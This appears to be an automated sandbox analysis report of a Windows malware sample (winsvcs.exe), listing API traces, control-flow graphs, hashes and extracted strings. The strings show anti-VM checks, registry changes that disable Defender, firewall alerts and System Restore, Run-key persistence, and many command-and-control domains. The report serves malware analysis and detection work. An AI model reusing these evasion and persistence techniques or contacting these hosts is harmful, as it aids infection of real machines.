                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
                                                                                                                                                                                                                          • String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
                                                                                                                                                                                                                          • API String ID: 246057343-461452962
                                                                                                                                                                                                                          • Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004032BF
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004032D5
                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 004032E9
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0040332A
                                                                                                                                                                                                                            • Part of subcall function 004032A4: SetCurrentDirectoryW.KERNEL32(00406BD4), ref: 0040333F
                                                                                                                                                                                                                            • Part of subcall function 004032A4: Sleep.KERNEL32(000003E8), ref: 004034F0
                                                                                                                                                                                                                            • Part of subcall function 004032A4: PathFindFileNameW.SHLWAPI(?), ref: 0040353F
                                                                                                                                                                                                                            • Part of subcall function 004032A4: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00403575
                                                                                                                                                                                                                            • Part of subcall function 004032A4: DeleteFileW.KERNEL32(00000000), ref: 00403581
                                                                                                                                                                                                                            • Part of subcall function 004032A4: Sleep.KERNEL32(000001F4), ref: 0040358C
                                                                                                                                                                                                                            • Part of subcall function 004032A4: CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe,?,00000000), ref: 004035A0
                                                                                                                                                                                                                            • Part of subcall function 004032A4: Sleep.KERNEL32(00000064), ref: 004035A8
                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00403361
                                                                                                                                                                                                                          • CharLowerW.USER32(?), ref: 004033FB
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00403430
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00403470
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 004034B0
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004035B5
                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(000000FF,?), ref: 004035C8
                                                                                                                                                                                                                          • FindClose.KERNEL32(000000FF), ref: 004035DC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep$File$Find$CurrentDirectoryNamePathmemset$AttributesCharCloseCopyDeleteFirstFullLowerNext
                                                                                                                                                                                                                          • String ID: *.*$.7z$.exe$.rar$.tar$.zip$C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe$Recycle.Bin$Windows Archive Manager.exe$Windows Archive Manager.exe$Windows Archive Manager.exe
                                                                                                                                                                                                                          • API String ID: 3651916915-1537326886
                                                                                                                                                                                                                          • Opcode ID: 0eae164103ee7fbc4dc8609290cbb788cf102168f8367d84f2ccf246b0e4433d
                                                                                                                                                                                                                          • Instruction ID: 13ad03c69c0ac6c2c187dcc74027e427e02459b5877deabd40d7f6eaf18e51b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eae164103ee7fbc4dc8609290cbb788cf102168f8367d84f2ccf246b0e4433d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D817F71904618AFEB209F60DD49B9E77B9EB44305F5001FAF109F61D0EF7A9A948F18

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 441 40317d-40321a GetModuleHandleA 442 403236-403242 Sleep 441->442 443 40321c-40322c GetProcAddress 441->443 445 40324b-40324f 442->445 443->442 444 40322e-403230 ExitProcess 443->444 446 403251-403258 call 401e97 445->446 447 40326c-403278 Sleep 445->447 452 40325d-403260 446->452 448 403281-403285 447->448 450 4032a2-4032a3 448->450 451 403287-403296 GetModuleHandleA 448->451 453 4032a0 451->453 454 403298-40329a ExitProcess 451->454 455 403262-403264 ExitProcess 452->455 456 40326a 452->456 453->448 456->445
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403230
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00403238
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403264
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0040326E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00407204), ref: 0040328E
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040329A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$HandleModuleSleep$AddressProc
                                                                                                                                                                                                                          • String ID: dir_watch.dll$kernel32.dll$prl_cc.exe$prl_tools.exe$python.exe$pythonw.exe$sbiedll.dll$sbiedllx.dll$tpautoconnsvc.exe$vboxcontrol.exe$vboxservice.exe$vboxtray.exe$vmsrvc.exe$vmtoolsd.exe$vmusrvc.exe$vmwareservice.exe$vmwaretray.exe$vmwareuser.exe$wine_get_unix_file_name$wpespy.dll$xenservice.exe
                                                                                                                                                                                                                          • API String ID: 2350661518-2780004707
                                                                                                                                                                                                                          • Opcode ID: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
                                                                                                                                                                                                                          • Instruction ID: b154389cd1554f0ebcfe2a125868a98a7489832b6cac9f633827aa8e2f46737f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A570D08248DBDB109FE4DD4869EBFB4BB05705F10806AE502BE2D4C7B86949CF9E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 584 479044-479074 GetPEB 585 479077-47909a 584->585 586 47909d-4790a0 585->586 587 4790a6-4790bc 586->587 588 4791ee-47922b CreateFileA 586->588 589 479110-479116 587->589 590 4790be-4790c5 587->590 605 479265-479269 588->605 606 47922d-479230 588->606 593 479129-47912f 589->593 594 479118-47911f 589->594 590->589 591 4790c7-4790ce 590->591 591->589 597 4790d0-4790d7 591->597 595 479131-479138 593->595 596 479148-47914e 593->596 594->593 598 479121-479124 594->598 595->596 600 47913a-479141 595->600 601 479167-47916f 596->601 602 479150-479157 596->602 597->589 603 4790d9-4790dd 597->603 599 4791bb-4791c0 598->599 608 4791c2-4791c5 599->608 609 4791e0-4791e9 599->609 600->596 607 479143-479146 600->607 611 479171-479178 601->611 612 479188-47918e 601->612 602->601 610 479159-479160 602->610 603->589 613 4790df-4790e3 603->613 614 479232-479238 606->614 607->599 608->609 615 4791c7-4791ca 608->615 609->586 610->601 616 479162-479165 610->616 611->612 617 47917a-479181 611->617 619 4791a7-4791ad 612->619 620 479190-479197 612->620 613->599 618 4790e9-47910b 613->618 622 479246-479251 614->622 623 47923a-479242 614->623 615->609 624 4791cc-4791cf 615->624 616->599 617->612 625 479183-479186 617->625 618->585 619->599 621 4791af-4791b6 619->621 620->619 626 479199-4791a0 620->626 621->599 627 4791b8 621->627 632 479255-479261 622->632 623->614 628 479244 623->628 624->609 629 4791d1-4791d4 624->629 625->599 626->619 631 4791a2-4791a5 626->631 627->599 628->632 629->609 633 4791d6-4791d9 629->633 631->599 632->605 633->609 634 4791db-4791de 633->634 634->588 634->609
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4802229274.0000000000479000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00479000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_479000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
                                                                                                                                                                                                                          • API String ID: 823142352-4190719182
                                                                                                                                                                                                                          • Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 272 40373e-403d01 call 4047c0 Sleep call 40317d CreateMutexA GetLastError 277 403d03-403d05 ExitProcess 272->277 278 403d0b-403dc7 memset * 3 GetModuleFileNameW _snwprintf DeleteFileW Sleep 272->278 280 403ed6-403f1a Sleep _snwprintf 278->280 281 403dcd-403e84 memset * 3 ExpandEnvironmentStringsW _snwprintf * 2 PathFileExistsW 278->281 284 403f20-403f39 280->284 282 403e86 281->282 283 403e8a-403e99 PathFileExistsW 281->283 282->280 287 403eaa-403ec2 CopyFileW 283->287 288 403e9b-403ea4 CreateDirectoryW 283->288 285 403f83-403f88 284->285 286 403f3b-403f43 284->286 291 403f8e-403fa1 285->291 289 403f45-403f60 286->289 290 403f7a-403f81 286->290 292 403ec4 287->292 293 403ec6-403ecb Sleep 287->293 288->287 289->285 294 403f62-403f78 289->294 290->291 295 403fa7-403fe5 SetFileAttributesW * 2 RegOpenKeyExW 291->295 296 40413b-404166 Sleep RegOpenKeyExW 291->296 292->280 292->293 294->284 294->290 299 404070-404090 RegOpenKeyExW 295->299 300 403feb-404000 295->300 297 404220-404240 RegOpenKeyExW 296->297 298 40416c-404199 RegQueryValueExW 296->298 303 404246-404271 RegQueryValueExW 297->303 304 4043f8-404418 RegOpenKeyExW 297->304 301 404214-40421a RegCloseKey 298->301 302 40419b-4041b0 298->302 306 404096-4040ab 299->306 307 40411b-404135 call 40206e Sleep ExitProcess 299->307 305 404006-404025 300->305 301->297 309 4041b6-4041d5 302->309 312 404291-4042b1 RegOpenKeyExW 303->312 313 404273-40428b RegSetValueExW 303->313 310 4044a6-4044c6 RegOpenKeyExW 304->310 311 40441e-404425 304->311 305->305 314 404027-40406a RegSetValueExW RegCloseKey 305->314 315 4040b1-4040d0 306->315 309->309 317 4041d7-40420e RegSetValueExW 309->317 321 404554-404574 RegOpenKeyExW 310->321 322 4044cc-4044d3 310->322 318 404434-40443b 311->318 319 4042b3-4042d3 RegCreateKeyExA 312->319 320 4042d9-4042f9 RegOpenKeyExW 312->320 313->312 314->299 315->315 323 4040d2-404115 RegSetValueExW RegCloseKey 315->323 317->301 327 40449a-4044a0 RegCloseKey 318->327 328 40443d-404470 RegQueryValueExW 318->328 319->320 329 4043ec-4043f2 RegCloseKey 320->329 330 4042ff-40432a RegQueryValueExW 320->330 325 404576-4045a1 RegQueryValueExW 321->325 326 4045cd-404602 Sleep CreateThread Sleep call 401fac 321->326 324 4044e2-4044e9 322->324 323->307 331 404548-40454e RegCloseKey 324->331 332 4044eb-40451e RegQueryValueExW 324->332 333 4045c1-4045c7 RegCloseKey 325->333 334 4045a3-4045bb RegSetValueExW 325->334 349 404604-404630 Sleep CreateThread Sleep 326->349 350 40466b-404670 Sleep 326->350 327->310 336 404472-404492 RegSetValueExW 328->336 337 404498 328->337 329->304 338 40434a-404375 RegQueryValueExW 330->338 339 40432c-404344 RegSetValueExW 330->339 331->321 342 404520-404540 RegSetValueExW 332->342 343 404546 332->343 333->326 334->333 336->337 337->318 340 404395-4043c0 RegQueryValueExW 338->340 341 404377-40438f RegSetValueExW 338->341 339->338 346 4043e0-4043e6 RegCloseKey 340->346 347 4043c2-4043da RegSetValueExW 340->347 341->340 342->343 343->324 346->329 347->346 352 40463f-404646 349->352 351 404676-40469b Sleep 350->351 356 4046a1-404707 Sleep memset _snprintf call 401cda Sleep 351->356 357 4047a2 351->357 352->350 353 404648-404661 Sleep call 401cda 352->353 358 404666-404669 353->358 362 404716-40471d 356->362 357->351 358->352 363 40479d 362->363 364 40471f-40477c Sleep memset _snprintf call 401674 362->364 363->357 367 404798 364->367 368 40477e-404792 CreateThread 364->368 367->362 368->367
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,00401182,00000000,?,0000000A), ref: 00403752
                                                                                                                                                                                                                            • Part of subcall function 0040317D: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
                                                                                                                                                                                                                            • Part of subcall function 0040317D: GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
                                                                                                                                                                                                                            • Part of subcall function 0040317D: ExitProcess.KERNEL32 ref: 00403230
                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00403CEA
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403CF6
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403D05
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D2A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D40
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403D56
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D6C
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403D8A
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D99
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403DA4
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DDB
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403DF1
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403E07
                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E46
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403E6D
                                                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00403E7C
                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00403EDB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.info/, xrefs: 00403C99
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.biz/, xrefs: 00403A87
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.biz/, xrefs: 00403C03
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.net/, xrefs: 00403A73
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.ru/, xrefs: 0040386B
                                                                                                                                                                                                                          • winsvcs.exe, xrefs: 00403770
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.in/, xrefs: 004039D3
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.info/, xrefs: 00403C85
                                                                                                                                                                                                                          • %ls\94000696690303050, xrefs: 00403E35
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.ru/, xrefs: 0040384D
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.biz/, xrefs: 00403ACD
                                                                                                                                                                                                                          • http://fiiauediehduefuge.com/, xrefs: 00403B81
                                                                                                                                                                                                                          • t.exe, xrefs: 0040378F
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.in/, xrefs: 00403983
                                                                                                                                                                                                                          • x, xrefs: 0040463F
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.in/, xrefs: 00403965
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.biz/, xrefs: 00403BC7
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.in/, xrefs: 00403997
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.biz/, xrefs: 00403AD7
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.info/, xrefs: 00403C49
                                                                                                                                                                                                                          • AutoUpdateDisableNotify, xrefs: 0040381B
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.com/, xrefs: 00403B63
                                                                                                                                                                                                                          • http://fiiauediehduefuge.net/, xrefs: 00403A5F
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.biz/, xrefs: 00403BDB
                                                                                                                                                                                                                          • %userprofile%, xrefs: 004037CB
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.su/, xrefs: 00403947
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.su/, xrefs: 004038D9
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.su/, xrefs: 004038CF
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnu.ru/, xrefs: 0040382F
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.info/, xrefs: 00403CB7
                                                                                                                                                                                                                          • DisableScanOnRealtimeEnable, xrefs: 00404339
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.su/, xrefs: 0040391F
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.ru/, xrefs: 00403889
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.net/, xrefs: 00403A0F
                                                                                                                                                                                                                          • http://eofihsishihiursgu.com/, xrefs: 00403B9F
                                                                                                                                                                                                                          • http://fiiauediehduefuge.biz/, xrefs: 00403C17
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.info/, xrefs: 00403C7B
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.biz/, xrefs: 00403A9B
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Security Center\, xrefs: 00404406
                                                                                                                                                                                                                          • m.exe, xrefs: 00403799
                                                                                                                                                                                                                          • %ls\%ls, xrefs: 00403E5C
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.ru/, xrefs: 00403875
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\, xrefs: 0040422E
                                                                                                                                                                                                                          • http://eofihsishihiursgu.net/, xrefs: 00403A7D
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.in/, xrefs: 004039AB
                                                                                                                                                                                                                          • DisableAntiSpyware, xrefs: 00404280
                                                                                                                                                                                                                          • http://aiiaiafrzrueuedur.in/, xrefs: 00403979
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.biz/, xrefs: 00403BEF
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.info/, xrefs: 00403C8F
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.biz/, xrefs: 00403AA5
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.in/, xrefs: 004039BF
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.su/, xrefs: 0040390B
                                                                                                                                                                                                                          • http://eofihsishihiursgu.in/, xrefs: 004039E7
                                                                                                                                                                                                                          • %ls:Zone.Identifier, xrefs: 00403D79
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.biz/, xrefs: 00403BF9
                                                                                                                                                                                                                          • FirewallDisableNotify, xrefs: 00403825
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.net/, xrefs: 00403A2D
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.biz/, xrefs: 00403AB9
                                                                                                                                                                                                                          • http://iuirshriuisruruuf.ru/, xrefs: 0040387F
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.info/, xrefs: 00403C67
                                                                                                                                                                                                                          • http://fiiauediehduefuge.in/, xrefs: 004039C9
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.biz/, xrefs: 00403C0D
                                                                                                                                                                                                                          • http://eofihsishihiursgu.ru/, xrefs: 004038BB
                                                                                                                                                                                                                          • AntiVirusOverride, xrefs: 004037E9
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.biz/, xrefs: 00403AAF
                                                                                                                                                                                                                          • DisableScanOnRealtimeEnable, xrefs: 0040430C
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.su/, xrefs: 00403929
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.com/, xrefs: 00403B6D
                                                                                                                                                                                                                          • http://92.63.197.48/, xrefs: 00403839
                                                                                                                                                                                                                          • http://fuaiuebndieufeufu.ru/, xrefs: 00403857
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.net/, xrefs: 00403A69
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.biz/, xrefs: 00403BB3
                                                                                                                                                                                                                          • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\, xrefs: 00404154
                                                                                                                                                                                                                          • 4950050503930, xrefs: 0040375D
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.biz/, xrefs: 00403AF5
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 0040429F
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.com/, xrefs: 00403B45
                                                                                                                                                                                                                          • %appdata%, xrefs: 004037D5
                                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.in/, xrefs: 004039B5
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.ru/, xrefs: 004038C5
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.net/, xrefs: 00403A05
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.biz/, xrefs: 00403C21
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.net/, xrefs: 00403B13
                                                                                                                                                                                                                          • SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\, xrefs: 004042E7
                                                                                                                                                                                                                          • %windir%, xrefs: 004037C1
                                                                                                                                                                                                                          • http://nousiieiffgogogoo.su/, xrefs: 0040393D
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.in/, xrefs: 004039F1
                                                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\, xrefs: 00404562
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.su/, xrefs: 00403901
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.info/, xrefs: 00403CD5
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.info/, xrefs: 00403C53
                                                                                                                                                                                                                          • DisableSR, xrefs: 00404583
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.com/, xrefs: 00403B59
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.in/, xrefs: 0040398D
                                                                                                                                                                                                                          • DisableOnAccessProtection, xrefs: 00404384
                                                                                                                                                                                                                          • AntiVirusDisableNotify, xrefs: 00403807
                                                                                                                                                                                                                          • http://srndndubsbsifurfd.com/, xrefs: 00403B77
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.ru/, xrefs: 004038B1
                                                                                                                                                                                                                          • http://eofihsishihiursgu.biz/, xrefs: 00403B09
                                                                                                                                                                                                                          • x, xrefs: 00404694
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.biz/, xrefs: 00403BBD
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.in/, xrefs: 004039A1
                                                                                                                                                                                                                          • http://fiiauediehduefuge.info/, xrefs: 00403CAD
                                                                                                                                                                                                                          • http://slpsrgpsrhojifdij.com/, xrefs: 00403B27
                                                                                                                                                                                                                          • http://eiifngjfksisiufjf.su/, xrefs: 004038F7
                                                                                                                                                                                                                          • http://ssofhoseuegsgrfnj.net/, xrefs: 004039FB
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.biz/, xrefs: 00403C3F
                                                                                                                                                                                                                          • DisableSR, xrefs: 004045B0
                                                                                                                                                                                                                          • http://afeifieuuufufufuf.net/, xrefs: 00403A4B
                                                                                                                                                                                                                          • http://eoroooskfogihisrg.com/, xrefs: 00403B4F
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.biz/, xrefs: 00403C2B
                                                                                                                                                                                                                          • http://fiiauediehduefuge.ru/, xrefs: 0040389D
                                                                                                                                                                                                                          • DisableAntiSpyware, xrefs: 00404253
                                                                                                                                                                                                                          • http://nnososoosjfeuhueu.su/, xrefs: 0040395B
                                                                                                                                                                                                                          • FirewallOverride, xrefs: 004037FD
                                                                                                                                                                                                                          • http://eofihsishihiursgu.info/, xrefs: 00403CCB
                                                                                                                                                                                                                          • http://fifiehsueuufidhfi.in/, xrefs: 004039DD
                                                                                                                                                                                                                          • DisableOnAccessProtection, xrefs: 00404357
                                                                                                                                                                                                                          • s.exe, xrefs: 004037AD
                                                                                                                                                                                                                          • http://noeuaoenriusfiruu.net/, xrefs: 00403A37
